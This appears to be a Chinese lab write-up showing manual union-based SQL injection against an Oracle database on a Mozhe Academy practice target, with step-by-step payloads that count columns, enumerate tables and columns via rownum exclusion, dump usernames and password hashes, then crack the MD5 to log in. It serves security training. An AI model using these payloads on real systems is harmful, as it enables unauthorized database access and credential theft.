墨者:SQL手工注入漏洞测试(Oracle数据库)

一、SQL手工注入漏洞测试(Oracle数据库)

本文以墨者学院靶场为例,演示Oracle数据库的手工SQL注入全过程。靶场以自己的地址为准:http://124.70.64.48:49921/new_list.php?id=1

二、注入步骤详解(如下指令去掉了id之前的内容)

1. 判断字段数量

sql 复制代码
id=1 order by 3

通过递增order by后的数字,当报错时说明超出字段数。本例中order by 2不报错,order by 3报错,说明有2个字段。

2. 确定回显位置

sql 复制代码
id=1 union select 'null','null' from dual

使用null占位,第1、2列会回显数据。

3. 获取数据库信息

sql 复制代码
id=1 union select (SELECT global_name FROM global_name),'null' from dual

使用global_name获取数据库全局名称。

4. 获取表名

模糊查询表名
sql 复制代码
id=1 union select (select table_name from user_tables where rownum=1 and table_name like '%user%'),'null' from dual

5. 获取字段名

获取首个字段
sql 复制代码
id=1 union select (select column_name from user_tab_columns where rownum =1 and table_name='sns_users' ),'null' from dual
获取其他字段
sql 复制代码
id=1 union select (select column_name from user_tab_columns where rownum=1 and table_name='sns_users' and column_name != 'USER_NAME'),'null' from dual

为什么要排除已查字段?

  1. Oracle没有类似MySQL的limit offset语法
  2. rownum=1只能获取第一条记录
  3. 通过column_name != '已获取字段名'可以获取下一条记录
  4. 确保完整枚举所有字段

6. 获取数据

获取首条记录
sql 复制代码
id=1 union select USER_NAME,USER_PWD from "sns_users" where rownum=1
排除已获取记录
sql 复制代码
id=1 union select USER_NAME,USER_PWD from "sns_users" where rownum=1 and USER_NAME != 'zhong'

id=1 union select USER_NAME,USER_PWD from "sns_users" where rownum=1 and USER_NAME != 'zhong' and USER_NAME != 'hu'


为什么要用排除法获取数据?

  1. Oracle的rownum限制导致无法直接获取第N条记录
  2. 通过USER_NAME != '已知用户名'可以遍历所有记录
  3. 这是Oracle环境下最可靠的数据枚举方法
  4. 可以确保不遗漏任何数据

7. MD5解密后,手动登录,获取Key

MD5工具地址:https://www.cmd5.com/

三、关键指令解析

指令/函数 说明 典型应用场景
order by 判断字段数量 确定UNION查询的列数
union select 联合查询 获取系统数据
dual Oracle虚拟表 用于不需要真实表的查询
global_name 数据库全局名 获取当前数据库信息
user_tables 用户表视图 枚举数据库表
user_tab_columns 用户列视图 获取表结构
rownum 行号限制 Oracle特有的分页方式
not in/!= 排除查询 解决rownum限制的关键
相关推荐
哈__9 分钟前
MongoDB 平替新方案:金仓多模数据库驱动电子证照国产化落地
数据库·1024程序员节
微学AI1 小时前
国产数据库替代MongoDB的技术实践过程:金仓多模数据库在电子证照系统中的深度应用
数据库·人工智能·1024程序员节
TDengine (老段)1 小时前
TDengine 数据函数 ROUND 用户手册
java·大数据·数据库·物联网·时序数据库·tdengine·1024程序员节
TDengine (老段)1 小时前
TDengine 数学函数 RAND 用户手册
java·大数据·数据库·物联网·时序数据库·tdengine·涛思数据
野犬寒鸦1 小时前
从零起步学习MySQL || 第十章:深入了解B+树及B+树的性能优势(结合底层数据结构与数据库设计深度解析)
java·数据库·后端·mysql·1024程序员节
GZ_TOGOGO1 小时前
Oracle OCP考试报名常见问题详解
数据库·oracle·ocp认证
睡不醒的猪儿1 小时前
nginx日志同步阿里云datahub后写入数据库
数据库·nginx·阿里云
xie_zhr2 小时前
【PB案例学习笔记】-46在数据窗口中编辑数据
数据库·his·1024程序员节·干货分享·pb·powerbuilder
小小的木头人2 小时前
Redis 集群安装指南
数据库·redis
星空的资源小屋2 小时前
Antares SQL,一款跨平台开源 SQL 客户端
数据库·人工智能·pdf·开源·电脑·excel·1024程序员节